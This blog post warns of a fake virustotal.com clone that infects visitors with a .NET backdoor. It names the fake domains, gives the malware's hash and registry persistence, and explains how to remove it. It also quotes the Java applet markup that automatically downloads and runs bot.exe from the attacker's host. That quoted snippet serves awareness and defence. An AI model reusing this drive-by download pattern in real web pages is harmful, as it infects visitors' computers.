Fake virustotal.com website leading to malware

With over 200.000 of submissions per day, http://www.virustotal.com is the greatest online scanner for malware and dubious URL’s. All the major antivirus engines are combined in a very fast and free service, giving a more accurate idea about the character of a submitted file — malware or not, much more accurate than a single antivirus and thus it has a huge number of visitors aka submitters.

This was speculated recently by malicious persons in a spreading malware attempt. They were created a fake virustotal.com website, a so called “clone”. The “clones”, fake websites of well-known websites are intensively used by hackers to trick the visitors and provoke them to introduce in the fake website fields their credentials for the real websites or even the credit card details, in this way all these important data are stolen.

In our example, the fake virustotal page the intent was to infect the visitors with a malware of type backdoor/trojan. NOD32 antivirus report it as : a variant of MSIL/Restamdos.AD or Backdoor:MSIL/Pontoeb.B by Microsoft antivirus. Here is virustotal.com report for this malware. It’s a “semi-compiled” malware program, it needs .NET Framework in order to run.

The fake virustotal website, http://new-virustotal.tk runs the fake web page in a frame hosted at http://readman.pf-control.de/java/. The fake virustotal web page has also a Java applet which automatically download and execute in the visitors computer the malware above mentioned.

The Java applet is a simple one, see its source:

<applet code=”Main.class” archive=”signedapplet.jar” width=”30″ height=”20″ >
<param name=”fileName” value=”bot.exe”>
<param name=”url” value=”http://readman.pf-control.de/java/”>
</applet>

and here is the fake virustotal.com website home page:

fake virustotal website

 

The malware that the virustotal.com fake website is spreading has 104,960 bytes in size and MD5 hash: 40E2C636E5864CD521B5366342E20AA1

It’s good to know how to remove this malware from your computer. The malware will autostart at every computer reboot adding two registry entries under keys:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]

Look at these registry keys using the registry editor for any suspicious value. It’s a known fact also that the malware create a sub-folder named recyclerr in the %appdata% folder, containing a file, recyclerr.exe and this is actually the virus body. You must stop the malware process using Task Manager and delete the malware file before mentioned.

As a general security rule, do a habit from verifying the links the links before to click them hovering the mouse over them a second or two and try to avoid those links that are looking like a fake website site; very often fake websites differs from the legit websites only with a letter or two, almost they have similar names but are not the same.

Keep safe !

Posted in Thoughts.

One Response

Leave a Reply

Your email address will not be published. Required fields are marked *